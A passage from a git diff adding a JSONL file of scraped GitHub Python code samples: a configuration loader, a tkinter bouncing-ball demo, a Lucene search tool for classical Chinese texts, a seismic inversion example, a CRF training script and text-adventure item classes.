diff --git "a/2581.jsonl" "b/2581.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2581.jsonl"
@@ -0,0 +1,650 @@
+{"seq_id":"70622692214","text":"import json\nimport os\nimport sys\n\nimport yaml\nfrom pydash import defaults_deep\n\n\nclass CipherConfig():\n    \"\"\"Utilities used for managing application configuration.\"\"\"\n\n    Environment = \"Development\"\n    \"\"\"\n    Specifies the environment of the server. Could be either \"Development\", \"Staging\", or \"Production\".\n\n    **Config Key**: \"CipherEnvironment\"\n\n    **Default Value**: \"Development\"\n    \"\"\"\n\n    Country = \"US\"\n    \"\"\"\n    Specifies the country of the server.\n\n    **Config Key**: \"CipherCountry\"\n\n    **Default Value**: \"US\"\n    \"\"\"\n\n    DefaultSearchLocation = None\n    \"\"\"\n    Specifies a location to include when searching for connection \"server.json\" configuration files, and environment \"environment.json\" files.\n\n    **Config Key**: \"ConfigSearchPath\"\n\n    **Default Value**: \"D:\\\\\\\\apps\" or \"P:\\\\\\\\\"\n    \"\"\"\n\n    @staticmethod\n    def get_DefaultSearchLocation():\n        return CipherConfig.DefaultSearchLocation if CipherConfig.DefaultSearchLocation is not None else [\"D:\\\\apps\", \"P:\\\\\"]\n\n    @staticmethod\n    def load(filepath: str, checkForEnvTransforms=True, ignoreConfigSearchPathKey=False) -> dict:\n        \"\"\"\n        Loads a YAML file and returns it as a dictionary.\n\n        If the dictionary contains any of the config keys for the three properties of CipherConfig listed above,\n        they will be set and used going forward.\n\n        If the ``checkForEnvTransforms`` argument is True or unspecified,\n        it will additionally load any current environment specific files if they exist.\n        For example, if the current environment is configured as ``Development`` and filepath is ``parameters.yaml``,\n        a file named ``parameters.development.yaml`` will be loaded and merged with ``parameters.yaml``.\n        Values in the environment transform file will override values in the main file.\n        \"\"\"\n        config = None\n        with open(filepath, \"r\") as ymlfile:\n            config = yaml.load(ymlfile, Loader=yaml.SafeLoader)\n\n        if checkForEnvTransforms:\n            (root, ext) = os.path.splitext(filepath)\n            path = root + \".\" + CipherConfig.Environment.lower() + ext\n            if os.path.isfile(path):\n                with open(path, \"r\") as ymlfile:\n                    env_config = yaml.load(ymlfile, Loader=yaml.SafeLoader)\n                    config = defaults_deep({}, env_config, config)\n\n        if not ignoreConfigSearchPathKey:\n            if \"ConfigSearchPath\" in config:\n                CipherConfig.DefaultSearchLocation = config[\"ConfigSearchPath\"]\n                CipherConfig.loadEnvironment()\n        if \"CipherEnvironment\" in config:\n            CipherConfig.Environment = config[\"CipherEnvironment\"]\n        if \"CipherCountry\" in config:\n            CipherConfig.Country = config[\"CipherCountry\"]\n\n        return config\n\n    @staticmethod\n    def loadConnections(configpath=\"servers.json\", search_location=None) -> list:\n        \"\"\"\n        Typically only used internally by CipherData to locate and load a servers.json file and return a list of connection configurations.\n        \"\"\"\n        if search_location is None:\n            search_location = CipherConfig.get_DefaultSearchLocation()\n\n        __location__ = CipherConfig.__searchPath(configpath, search_location)\n\n        if __location__ is None:\n            raise FileNotFoundError(\"Could not find servers.json in \" + str(search_location))\n\n        with open(__location__, 'r') as f:\n            return json.load(f)\n\n    @staticmethod\n    def loadEnvironment(configpath=\"environment.json\", search_location=None, ignoreEnvVars=False):\n        \"\"\"\n        Typically only used internally by CipherConfig to locate and load an environment.json file and set the Environment
and Country properties on application start.\n\n This method is called on the first import of the module and uses the DefaultSearchLocation property default value first.\n If the config key “ConfigSearchPath” is present in a file loaded by the CipherConfig.load method,\n this method will be called again to try to locate and load environment.json again.\n \"\"\"\n\n os_env = os.getenv(\"Cipher_Environment\", None) if not ignoreEnvVars else None\n os_country = os.getenv(\"Cipher_Country\", None) if not ignoreEnvVars else None\n\n if os_env is None or os_country is None:\n __location__ = CipherConfig.__searchPath(configpath, search_location)\n\n if __location__ is None:\n return\n\n with open(__location__, 'r') as f:\n config = json.load(f)\n if \"Environment\" in config:\n CipherConfig.Environment = config[\"Environment\"]\n if \"Country\" in config:\n CipherConfig.Country = config[\"Country\"]\n\n CipherConfig.Environment = os_env if os_env is not None else CipherConfig.Environment\n CipherConfig.Country = os_country if os_country is not None else CipherConfig.Country\n\n @staticmethod\n def __searchPath(path, search_location):\n if os.path.isfile(path):\n __location__ = path\n else:\n if search_location is None:\n search_location = CipherConfig.get_DefaultSearchLocation()\n __location__ = None\n search_locations = list(sys.path)\n if type(search_location) is list:\n search_locations = search_location + search_locations\n else:\n search_locations.insert(1, search_location)\n for dirname in search_locations:\n candidate = os.path.join(dirname, path)\n if os.path.isfile(candidate):\n __location__ = candidate\n break\n\n return __location__\n\n\nCipherConfig.loadEnvironment()\n","repo_name":"vamseeachanta/aceengineercode","sub_path":"ExistingCodes/Reference/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71183560372","text":"from dataclasses import dataclass\nfrom tkinter import *\nimport time\n\nDURATION=0.01\n\n@dataclass\nclass Ball:\n id:int\n x:int\n y:int\n d:int\n vx:int\n vy:int\n c:str\n\n@dataclass\nclass Border:\n left:int\n right:int\n top:int\n bottom:int\n\ndef make_ball(x,y,d=10,vx=2,vy=2,c=\"black\"):\n id=canvas.create_rectangle(x,y,x+d,y+d,\n fill=c,outline=c)\n return Ball(id,x,y,d,vx,vy,c)\n\ndef move_ball(ball):\n ball.x=ball.x+ball.vx\n ball.y=ball.y+ball.vy\n\ndef redraw_ball(ball):\n canvas.coords(ball.id,ball.x,ball.y,\n ball.x+ball.d,ball.y+ball.d)\n\ndef make_walls(ox,oy,width,height):\n canvas.create_rectangle(ox,oy,ox+width,oy+height)\n\ntk=Tk()\ncanvas=Canvas(tk,width=800,height=600)\ncanvas.pack()\ntk.update()\n\nborder=Border(100,700,100,500)\nmake_walls(border.left,border.top,\n border.right-border.left,\n border.bottom-border.top)\n\nballs=[make_ball(110,110),\n make_ball(200,300),\n make_ball(500,100),\n make_ball(400,300),]\n\n\nwhile 1:\n for ball in balls:\n if ball.x+ball.vx < border.left \\\n or ball.x+ball.d+ball.vx > border.right:\n ball.vx *= -1\n \n if ball.y+ball.vy < border.top \\\n or ball.y+ball.d+ball.vy > border.bottom:\n ball.vy *= -1\n \n move_ball(ball)\n redraw_ball(ball)\n tk.update()\n time.sleep(DURATION)","repo_name":"kikugawa-shoma/python_game","sub_path":"Block_Breaking/ex02-2-bounce.py","file_name":"ex02-2-bounce.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12253991421","text":"import 
sys, os, lucene, time, re, json\nfrom java.nio.file import Paths\nfrom org.apache.lucene.store import SimpleFSDirectory\nfrom org.apache.lucene.search import IndexSearcher, BooleanQuery, BooleanClause, TermQuery, RegexpQuery\nfrom org.apache.lucene.search.spans import SpanQuery, SpanNearQuery, SpanTermQuery, SpanOrQuery, SpanMultiTermQueryWrapper, SpanNotQuery\nfrom org.apache.lucene.index import DirectoryReader, Term\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(os.path.dirname(os.path.abspath(__file__ + '../../')))\nfrom NewPatternCommandParser import CommandParser\nfrom Content import new_get_content, get_text_from_content\n\n\nword_reg = \"[\\u4E00-\\u9FA5\\uF900-\\uFA2D]\"\nindex_dir = \"../../index/index_ancient\"\nindex_dir_server = \"./function/index/index_ancient\"\n\n\nclass Searcher(object):\n def __init__(self, userQuery: str, directory: str, zh_to_hant_dict=None):\n d = SimpleFSDirectory(Paths.get(directory))\n if zh_to_hant_dict:\n self._zh_to_hant_dict = zh_to_hant_dict\n else:\n self._zh_to_hant_dict = {}\n self._dir = directory\n self._search = IndexSearcher(DirectoryReader.open(d))\n self._userQuery = CommandParser(userQuery)\n self._cur_field = None\n self._res = None\n self._reg = None\n\n def search(self, field):\n s = self._search\n u = self._userQuery\n zh_to_hant_dict = self._zh_to_hant_dict\n info = u.getFlagsInfo()\n flags_list = u.getFlagsList()\n sq_list = []\n word_index_list = []\n index_count = 0\n for flag in flags_list:\n if flag[\"type\"] == \"word\":\n word_index_list.append(index_count)\n if len(flag[\"content\"]) == 1:\n if flag[\"content\"][0] in zh_to_hant_dict:\n stq_list = [SpanTermQuery(Term(field, flag[\"content\"][0]))]\n for hant in zh_to_hant_dict[flag[\"content\"][0]]:\n stq_list.append(SpanTermQuery(Term(field, hant)))\n sq_list.append(SpanOrQuery(stq_list))\n else:\n sq_list.append(SpanTermQuery(Term(field, flag[\"content\"][0])))\n else:\n snq_list = []\n for w in flag[\"content\"]:\n if w in zh_to_hant_dict:\n stq_list = [SpanTermQuery(Term(field, w))]\n for hant in zh_to_hant_dict[w]:\n stq_list.append(SpanTermQuery(Term(field, hant)))\n snq_list.append(SpanOrQuery(stq_list))\n else:\n snq_list.append(SpanTermQuery(Term(field, w)))\n sq_list.append(SpanNearQuery(snq_list, 0, True))\n else:\n sq_list.append({\"op\": info[flag[\"content\"]][\"op\"], \"num\": info[flag[\"content\"]][\"num\"]})\n index_count += 1\n q = None\n count = 0\n for index in word_index_list:\n if count == 0:\n q = sq_list[index]\n count += 1\n else:\n if not isinstance(sq_list[index-1], dict):\n q = SpanNearQuery([q, sq_list[index]], 0, True)\n else:\n q = SpanNearQuery([q, sq_list[index]], sq_list[index-1][\"num\"][-1], True)\n query = q\n # 过滤项\n filters = u.getFields()\n bq = BooleanQuery.Builder()\n bq.add(BooleanClause(query, BooleanClause.Occur.MUST))\n for key in filters.keys():\n cur_reg = '('\n for ft in filters[key]:\n cur_reg += ft + '|'\n cur_reg = cur_reg[0: -1] + ')'\n rq = RegexpQuery(Term(key, cur_reg))\n bq.add(BooleanClause(rq, BooleanClause.Occur.MUST))\n query = bq.build()\n top_docs = s.search(query, 9999)\n self._cur_field = field\n\n reg = get_test_reg(flags_list, info, zh_to_hant_dict)\n doc_id_list = []\n hits = top_docs.scoreDocs\n for hit in hits:\n doc = s.doc(hit.doc)\n text = doc.get(\"text\")\n match_res = re.search(reg, text)\n if match_res:\n doc_id_list.append(hit.doc)\n self._res = doc_id_list\n self._reg = reg\n return self\n\n def get_by_page(self, page_num=0, page_size=30, length_tup=(30, 30)):\n 
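        # Take one page of matched doc ids (page_num/page_size), then rebuild each
        # regex hit with left/mid/right context windows clipped to length_tup.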
doc_id_list = self._res\n s = self._search\n d = self._dir\n reg = self._reg\n doc_list = []\n total_hits = len(doc_id_list)\n # 分页\n start_index = page_num * page_size\n if start_index + page_size <= len(doc_id_list):\n end_index = start_index + page_size\n else:\n end_index = len(doc_id_list)\n for i in range(start_index, end_index):\n doc = s.doc(doc_id_list[i])\n cur_id = doc.get(\"id\")\n r = doc.get(\"text\")\n document = doc.get(\"document\")\n section = doc.get(\"section\")\n match_span = re.search(reg, r).span()\n context = get_text_from_content(new_get_content(d, cur_id))\n prev_len = len(context[\"prev\"][-1])\n str_context = context[\"prev\"][-1] + context[\"cur\"][0] + context[\"next\"][0]\n match_span = (prev_len + match_span[0], prev_len + match_span[1])\n mid = str_context[match_span[0]: match_span[1]]\n if match_span[0] < length_tup[0]:\n left = str_context[0: match_span[0]]\n else:\n left = str_context[match_span[0] - length_tup[0]: match_span[0]]\n if len(str_context) - match_span[1] < length_tup[1]:\n right = str_context[match_span[1]:]\n else:\n right = str_context[match_span[1]: match_span[1] + length_tup[1]]\n doc_list.append({\"left\": left, \"mid\": mid, \"right\": right, \"id\": cur_id, \"document\": document, \"section\": section})\n return {\"total\": total_hits, \"doc_list\": doc_list, \"regexps\": [reg]}\n\n def get_result_statistics_by_keyword(self):\n doc_ids = self._res\n # print(doc_ids)\n s = self._search\n reg = self._reg\n res_dict = {}\n for doc_id in doc_ids:\n doc = s.doc(doc_id)\n text = doc.get(\"text\")\n key_word = re.search(reg, text).group()\n if key_word:\n if key_word in res_dict.keys():\n res_dict[key_word] += 1\n else:\n res_dict[key_word] = 1\n return res_dict\n\n def get_result_statistics_by_field(self, field):\n doc_ids = self._res\n s = self._search\n res_dict = {}\n for doc_id in doc_ids:\n doc = s.doc(doc_id)\n field_val = doc.get(field)\n if field_val:\n if field_val in res_dict.keys():\n res_dict[field_val] += 1\n else:\n res_dict[field_val] = 1\n return res_dict\n\n\ndef get_test_reg(flags_list, flags_info, zh_to_hant_dict):\n reg = \"\"\n mem = []\n for flag in flags_list:\n if flag[\"type\"] == \"word\":\n word_hant_reg = \"\"\n w_hant_reg = \"\"\n for w in flag[\"content\"]:\n w_hant_reg += \"[\" + w\n if w in zh_to_hant_dict:\n for hant in zh_to_hant_dict[w]:\n w_hant_reg += hant\n w_hant_reg += \"]\"\n word_hant_reg += w_hant_reg\n reg += word_hant_reg\n else:\n f_info = flags_info[flag[\"content\"]]\n op = f_info[\"op\"]\n num = f_info[\"num\"]\n if flag[\"content\"] not in mem:\n mem.append(flag[\"content\"])\n if op == \"<\":\n reg += \"(\" + word_reg + \"{1,\" + str(num[0]) + \"})\"\n elif op == \"-\":\n reg += \"(\" + word_reg + \"{\" + str(num[0]) + \",\" + str(num[1]) + \"})\"\n else:\n reg += \"(\" + word_reg + \"{\" + str(num[0]) + \"})\"\n else:\n reg += \"\\\\\" + str(mem.index(flag[\"content\"]) + 1)\n return reg\n\n\ndef initVM():\n vm_env = lucene.getVMEnv()\n if vm_env:\n vm_env.attachCurrentThread()\n else:\n lucene.initVM(vmargs=['-Djava.awt.headless=true'])\n\n\nif __name__ == '__main__':\n # uc = \"(V=1)先儒(K<5)釋不\"\n initVM()\n # uc = \"基立而後可大成也\"\n uc = \"好\"\n st = time.time()\n ucp = CommandParser(uc)\n print(Searcher(ucp, index_dir).search('text').get_result_statistics_by_field(\"dynasty\"))\n et = time.time()\n print('const:' + str(et - 
st))\n","repo_name":"xyorz/corpus","sub_path":"function/operation/pattern_search/NewPatternSearcher.py","file_name":"NewPatternSearcher.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9852488632","text":"import torch\nimport torchvision\nfrom scipy.ndimage import gaussian_filter\nimport matplotlib.pyplot as plt\nimport deepwave\nfrom deepwave import scalar_born\n\ndevice = torch.device('cuda' if torch.cuda.is_available()\n else 'cpu')\nny = 2301\nnx = 751\ndx = 4.0\nv_true = torch.from_file('marmousi_vp.bin',\n size=ny*nx).reshape(ny, nx)\n\n# Select portion of model for inversion\nny = 600\nnx = 250\nv_true = v_true[:ny, :nx]\n\n# Smooth to use as starting model\nv_init = (torch.tensor(1/gaussian_filter(1/v_true.numpy(), 40))\n .to(device))\nv = v_init.clone()\nv.requires_grad_()\n\nn_shots = 115\n\nn_sources_per_shot = 1\nd_source = 20 # 20 * 4m = 80m\nfirst_source = 10 # 10 * 4m = 40m\nsource_depth = 2 # 2 * 4m = 8m\n\nn_receivers_per_shot = 384\nd_receiver = 6 # 6 * 4m = 24m\nfirst_receiver = 0 # 0 * 4m = 0m\nreceiver_depth = 2 # 2 * 4m = 8m\n\nfreq = 25\nnt = 750\ndt = 0.004\npeak_time = 1.5 / freq\n\nobserved_data = (\n torch.from_file('marmousi_data.bin',\n size=n_shots*n_receivers_per_shot*nt)\n .reshape(n_shots, n_receivers_per_shot, nt)\n)\n\n# Select portion of data for inversion\nn_shots = 20\nn_receivers_per_shot = 100\nnt = 300\nobserved_data = (\n observed_data[:n_shots, :n_receivers_per_shot, :nt].to(device)\n)\n\n# source_locations\nsource_locations = torch.zeros(n_shots, n_sources_per_shot, 2,\n dtype=torch.long, device=device)\nsource_locations[..., 1] = source_depth\nsource_locations[:, 0, 0] = (torch.arange(n_shots) * d_source +\n first_source)\n\n# receiver_locations\nreceiver_locations = torch.zeros(n_shots, n_receivers_per_shot, 2,\n dtype=torch.long, device=device)\nreceiver_locations[..., 1] = receiver_depth\nreceiver_locations[:, :, 0] = (\n (torch.arange(n_receivers_per_shot) * d_receiver +\n first_receiver)\n .repeat(n_shots, 1)\n)\n\n# source_amplitudes\nsource_amplitudes = (\n (deepwave.wavelets.ricker(freq, nt, dt, peak_time))\n .repeat(n_shots, n_sources_per_shot, 1).to(device)\n)\n\n# Setup optimiser to perform inversion\nscatter = torch.zeros(ny, nx, device=device)\nscatter.requires_grad_()\noptimiser = torch.optim.LBFGS([v, scatter], lr=1)\nloss_fn = torch.nn.MSELoss()\n\n# Run optimisation/inversion\nn_epochs = 14\n\n\ndef closure():\n optimiser.zero_grad()\n # Remove high wavenumbers from the velocity model\n v_smooth = (\n torchvision.transforms.functional.gaussian_blur(\n v[None], [11, 11]\n ).squeeze()\n )\n # Remove low wavenumbers from the scattering model\n scatter_sharp = scatter - (\n torchvision.transforms.functional.gaussian_blur(\n scatter[None], [11, 11]\n ).squeeze()\n )\n out = scalar_born(\n v_smooth, scatter_sharp, dx, dt,\n source_amplitudes=source_amplitudes,\n source_locations=source_locations,\n receiver_locations=receiver_locations,\n bg_receiver_locations=receiver_locations,\n pml_freq=freq,\n )\n loss = 1e10 * loss_fn(out[-1]+out[-2], observed_data)\n loss.backward()\n print(loss.detach().item())\n return loss.item()\n\n\nfor epoch in range(n_epochs):\n print(epoch)\n optimiser.step(closure)\n\nv_smooth = (\n torchvision.transforms.functional.gaussian_blur(\n v.detach().cpu()[None], [11, 11]\n ).squeeze()\n )\nscatter_sharp = scatter.detach().cpu() - (\n torchvision.transforms.functional.gaussian_blur(\n 
scatter.detach().cpu()[None], [11, 11]\n ).squeeze()\n )\n\n# Plot\nvmin = v_true.min()\nvmax = v_true.max()\nsmin, smax = torch.quantile(scatter_sharp, torch.tensor([0.02, 0.98]))\n_, ax = plt.subplots(4, figsize=(10.5, 12.5), sharex=True,\n sharey=True)\nax[0].imshow(v_init.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\nax[0].set_title(\"Initial\")\nax[1].imshow(v_smooth.T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\nax[1].set_title(\"Out velocity\")\nax[2].imshow(scatter_sharp.T, aspect='auto', cmap='gray',\n vmin=smin, vmax=smax)\nax[2].set_title(\"Out scatter\")\nax[3].imshow(v_true.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\nax[3].set_title(\"True\")\nplt.tight_layout()\nplt.savefig('example_joint_migration_inversion.jpg')\n","repo_name":"ar4/deepwave","sub_path":"docs/example_joint_migration_inversion.py","file_name":"example_joint_migration_inversion.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"21"} +{"seq_id":"27492392197","text":"import argparse\nimport json\nimport logging\nimport shutil\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport joblib\nfrom tabulate import tabulate\n\nfrom experiments import corpus, training\nfrom experiments.evaluation import alpino, event_level, iob_level\n\nlogger = logging.getLogger(__name__)\n\n\nconfig = {\n \"n_folds\": 10,\n \"max_iter\": 500,\n \"main_events_only\": False,\n}\n\n\ndef train(args):\n\n timestamp = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n if args.test:\n out_dir = Path(\"output\") / f\"output-{timestamp}-test\"\n else:\n out_dir = Path(\"output\") / f\"output-{timestamp}\"\n out_dir.mkdir(parents=True)\n\n logging.basicConfig(filename=out_dir / \"train.log\", level=logging.DEBUG)\n\n if args.test:\n args.n_folds = 2\n args.max_iter = 10\n logger.warning(f\"Using test config: {args}\")\n else:\n logger.info(f\"Starting training with config: {args}\")\n\n # Prepare the X and y examples.\n examples = corpus.get_examples(main_events_only=args.main_events_only)\n logger.info(f\"Training with {len(examples)} training examples.\")\n\n # Initialize training folds.\n folds = list(training.make_folds(examples, args.n_folds))\n\n # Perform cross-validation training.\n training.train_crossval(folds, max_iter=args.max_iter)\n\n def save_examples(examples, dir):\n for ex in examples:\n ex_dir = dir / ex.id\n ex_dir.mkdir(parents=True)\n with open(ex_dir / \"x.json\", \"w\") as f:\n json.dump(ex.x, f)\n with open(ex_dir / \"y.json\", \"w\") as f:\n json.dump(ex.y, f)\n shutil.copy(ex.alpino_tree.file, ex_dir / \"alpino.xml\")\n\n # Dump the fold info.\n for fold in folds:\n\n fold_dir = out_dir / \"folds\" / f\"fold_{fold.id}\"\n fold_dir.mkdir(parents=True)\n joblib.dump(fold.crf, fold_dir / \"crf.pkl\")\n\n # Save each example in the fold.\n save_examples(fold.dev, fold_dir / \"data\" / \"dev\")\n\n logger.info(f\"Finished training -> {out_dir}\")\n\n\ndef eval(args):\n\n eval_dir = args.dir / \"eval\"\n\n if eval_dir.exists():\n raise ValueError(\n \"Eval dir already exists, hinting that evaluation has already been run on this dir. 
Remove the existing eval dir first.\"\n )\n else:\n eval_dir.mkdir(parents=True)\n\n logging.basicConfig(filename=eval_dir / \"eval.log\", level=logging.DEBUG)\n\n def load_examples(dir):\n examples = []\n for ex_dir in dir.iterdir():\n with open(ex_dir / \"x.json\", \"r\") as f:\n x = json.load(f)\n with open(ex_dir / \"y.json\", \"r\") as f:\n y = json.load(f)\n alpino_tree = alpino.AlpinoTree(\n ex_dir / \"alpino.xml\", restricted_mode=True\n )\n example = corpus.Example(\n id=ex_dir.stem, x=x, y=y, alpino_tree=alpino_tree\n )\n examples.append(example)\n return examples\n\n # Load fold data.\n fold_dirs = ((args.dir) / \"folds\").iterdir()\n\n folds = []\n for fold_dir in fold_dirs:\n id = fold_dir.stem.split(\"_\")[-1]\n crf = joblib.load(fold_dir / \"crf.pkl\")\n dev = load_examples(fold_dir / \"data\" / \"dev\")\n\n # For evaluation, no need to search for training data.\n fold = training.Fold(id=id, train=[], dev=dev)\n fold.crf = crf\n folds.append(fold)\n\n # Setup directories.\n micro_iob_scores_dir = eval_dir / \"scores_iob_micro\"\n micro_event_scores_dir = eval_dir / \"scores_event_spans_micro\"\n\n # Write out scores per fold and averaged.\n for fold in folds:\n\n # Each example in the fold's dev set contains a reference to the features x and the labeling y.\n # `example.x` is a list of feature dicts, 1 per token.\n # `example.y` is a list of BIO labels, 1 per token.\n\n golds = [ex.y for ex in fold.dev]\n xs = [ex.x for ex in fold.dev]\n trees = [ex.alpino_tree for ex in fold.dev]\n\n # Make prediction on the features dicts (xs) of the dev set examples in this fold.\n # The output has the same shape as Example.y: a list of BIO sequences, one per example.\n predictions = fold.crf.predict(xs)\n\n # Write out the predictions.\n m = []\n for x, gold, pred in zip(xs, golds, predictions):\n # Prepare a table with tokens, gold tags and pred tags.\n data = []\n for token_dict, gold_tag, pred_tag in zip(x, gold, pred):\n data.append(\n {\n \"token\": token_dict[\"token\"],\n \"gold\": gold_tag,\n \"pred\": pred_tag,\n }\n )\n m.append(tabulate(data, headers=\"keys\"))\n m = \"\\n\\n\".join(m)\n fp = eval_dir / \"predictions\" / f\"fold_{fold.id}.txt\"\n fp.parent.mkdir(parents=True, exist_ok=True)\n with open(fp, \"w\") as f:\n f.write(m)\n\n # Compute IOB scores.\n fold.micro_iob_scores = iob_level.score_micro_average(\n golds, predictions\n )\n\n # Compute event scores.\n fold.micro_event_scores = event_level.score_micro_average(\n golds, predictions, trees\n )\n\n write(\n fold.micro_iob_scores,\n micro_iob_scores_dir / f\"scores_{fold.id}.json\",\n )\n write(\n fold.micro_event_scores,\n micro_event_scores_dir / f\"scores_{fold.id}.json\",\n )\n\n write(\n training.average_scores([fold.micro_iob_scores for fold in folds]),\n micro_iob_scores_dir / \"averaged.json\",\n )\n\n write(\n training.average_scores([fold.micro_event_scores for fold in folds]),\n micro_event_scores_dir / \"averaged.json\",\n )\n\n logger.info(f\"Finished evaluation -> {eval_dir}\")\n\n\ndef write(json_dict, file_path):\n file_path.parent.mkdir(parents=True, exist_ok=True)\n with open(file_path, \"w\") as f:\n json.dump(json_dict, f, sort_keys=True, indent=4)\n\n\nparser = argparse.ArgumentParser()\nsubparsers = parser.add_subparsers()\n\nparser_train = subparsers.add_parser(\"train\")\nparser_train.add_argument(\n \"--n-folds\",\n help=\"Number of folds to use in crossval training.\",\n type=int,\n default=10,\n)\nparser_train.add_argument(\n \"--max-iter\",\n help=\"Number of iterations to run training in 
each fold.\",\n type=int,\n default=500,\n)\nparser_train.add_argument(\n \"--main-events-only\",\n help=\"If True, only use main events for training and evaluation.\",\n action=argparse.BooleanOptionalAction,\n default=False,\n)\nparser_train.add_argument(\n \"--test\",\n help=\"Use a test configuration that trains quickly.\",\n action=argparse.BooleanOptionalAction,\n default=False,\n)\nparser_train.set_defaults(func=train)\n\nparser_eval = subparsers.add_parser(\"eval\")\nparser_eval.add_argument(\n \"dir\",\n help=\"Directory containing folds saved after training.\",\n type=Path,\n)\nparser_eval.set_defaults(func=eval)\n\nargs = parser.parse_args()\n\n\nargs.func(args)\n","repo_name":"Zatteliet/eventdna-exp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23959730865","text":"'''\nCreated on Aug 22, 2014\n\n@author: Thomas\n'''\nfrom random import randint\nimport pyglet\nimport copy\nimport Enemies\n\nclass Item(object):\n #required params. instance cannot be created without these\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n self.name = name\n self.description = description\n self.seenDescription = seenDescription\n self.keywords = keywords\n self.currentLocation = None\n\n #set default values for case when no values are given\n self.initPickupDesc = None\n self.quantity = 1\n self.stackable = False\n self.accessible = True\n self.firstSeen = True\n self.firstTaken = True\n self.initPickupDesc = None\n self.initSeenDesc = None\n self.notTakenDesc = None\n self.drunkDesc = None\n self.drunkSearchDesc = None\n self.drunkDescThreshold = 50\n self.pickupSound = [\"Sounds/Misc/ItemGet.mp3\"]\n self.inAccessibleDesc = \"You can't reach it.\"\n self.pickupDesc = \"You pick up the \" + self.name + \".\"\n self.searchDesc = None\n \n #populate optional stats\n if kwargs is not None:\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def get(self, holder, player):\n #print \"Getting \" + self.name + \" - \" + str(self.quantity)\n if not self.accessible:\n return self.inaccessibleDesc,True\n\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n\n sources = list()\n \n #If there is more than 1, dup it and pass the dup. 
Quantity will be decremented later\n if (self.quantity > 1) and (not self.stackable):\n itemToGet = copy.deepcopy(self)\n itemToGet.quantity = 1\n itemToGet.firsSeen = False\n itemToGet.firstTaken = False\n else:\n itemToGet = self\n \n if self.quantity > 1 or (not self.firstTaken) or (not self.initPickupDesc):\n resultString = self.pickupDesc\n if self.stackable and (self.quantity > 1):\n resultString += \"(\" + str(self.quantity) + \")\"\n else :\n resultString = self.initPickupDesc\n self.firstSeen = False\n self.firstTaken = False\n\n sources.append(pyglet.media.load(self.pickupSound[randint(0, len(self.pickupSound) - 1)], streaming=False))\n #source.play()\n\n player.addItem(itemToGet)\n holder.removeItem(self)\n\n if (player.mainHand == None) and (isinstance(itemToGet, Weapon)):\n itemToGet.equip(player)\n return resultString, True, sources\n \n def drop(self, player):\n if (self.quantity > 1) and (not self.stackable):\n itemToDrop = copy.deepcopy(self)\n itemToDrop.quantity = 1\n else:\n itemToDrop = self\n\n player.removeItem(self)\n player.currentLocation.addItem(itemToDrop)\n resultString = \"You drop the \" + self.name\n if self.quantity > 1 and self.stackable:\n resultString += \"(\" + str(self.quantity) + \")\"\n return resultString,True\n \n def destroy(self, holder):\n holder.removeItem(self)\n \n def makeAccessible(self):\n self.accessible = True\n \n def makeInAccessible(self, desc):\n self.accessible = False\n self.inaccessibleDesc = desc\n \n def setPickupDesc(self, desc):\n self.pickupDesc = desc\n \n def setInitPickupDesc(self,desc):\n self.initPickupDesc = desc\n \n def setIdNum(self, number):\n self.idNum = number\n \n def lookAt(self, player):\n if self.drunkDesc and (player.intoxication >= self.drunkDescThreshold):\n return self.drunkDesc\n else:\n return self.description\n\n def search(self, player):\n resultString = \"\"\n if self.drunkSearchDesc and (player.intoxication >= self.drunkDescThreshold):\n resultString += self.drunkSearchDesc\n elif self.searchDesc:\n resultString += self.searchDesc\n elif self.drunkDesc and (player.intoxication >= self.drunkDescThreshold):\n resultString += self.drunkDesc\n resultString += \"\\n\\nThere isn't anything else of particular note about it.\"\n else:\n resultString += self.description\n resultString += \"\\n\\nThere isn't anything else of particular note about it.\"\n \n return resultString, True\n\n def exorciseAttempt(self, player):\n return \"After several minutes of yelling biblical phrases and waving your hands around wildly, you determine that the object is not, in fact, possessed.\"\n\n def playerRetreats(self):\n #if player is holding\n return \"No matter how you duck and weave to escape, it manages to stay right behind you the entire time. 
Possibly this has something to do with the fact that it is still in your pack.\"\n\nclass Armor(Item):\n \n def __init__(self, name, description, seenDescription, keywords, armorRating, **kwargs):\n self.armorRating = armorRating\n super(Armor, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def equip(self, player):\n if not(self.keywords in player.inventory):\n return \"I need to pick it up first.\"\n\n if player.armor == self:\n return \"You are already wearing that.\"\n \n player.armor = self\n return \"You put on the \" + self.name + \".\",True\n\n def wear(self, player):\n return self.equip(player)\n \nclass OffHandItem(Item):\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n self.size = 1\n super(OffHandItem, self).__init__(name, description, seenDescription, keywords, **kwargs)\n\n def equip(self, player):\n if not(self.keywords in player.inventory):\n return \"I need to pick it up first.\"\n\n if player.offHand == self:\n return \"That is already equipped.\"\n if self.size == 1:\n if player.mainHand == player.offHand:\n player.mainHand = None\n player.offHand = self\n return \"You equip the \" + self.name,True\n\nclass Weapon(Item):\n \n def __init__(self, name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs):\n #required\n self.minDamage = minDamage\n self.maxDamage = maxDamage\n self.accuracy = accuracy\n self.size = size\n\n 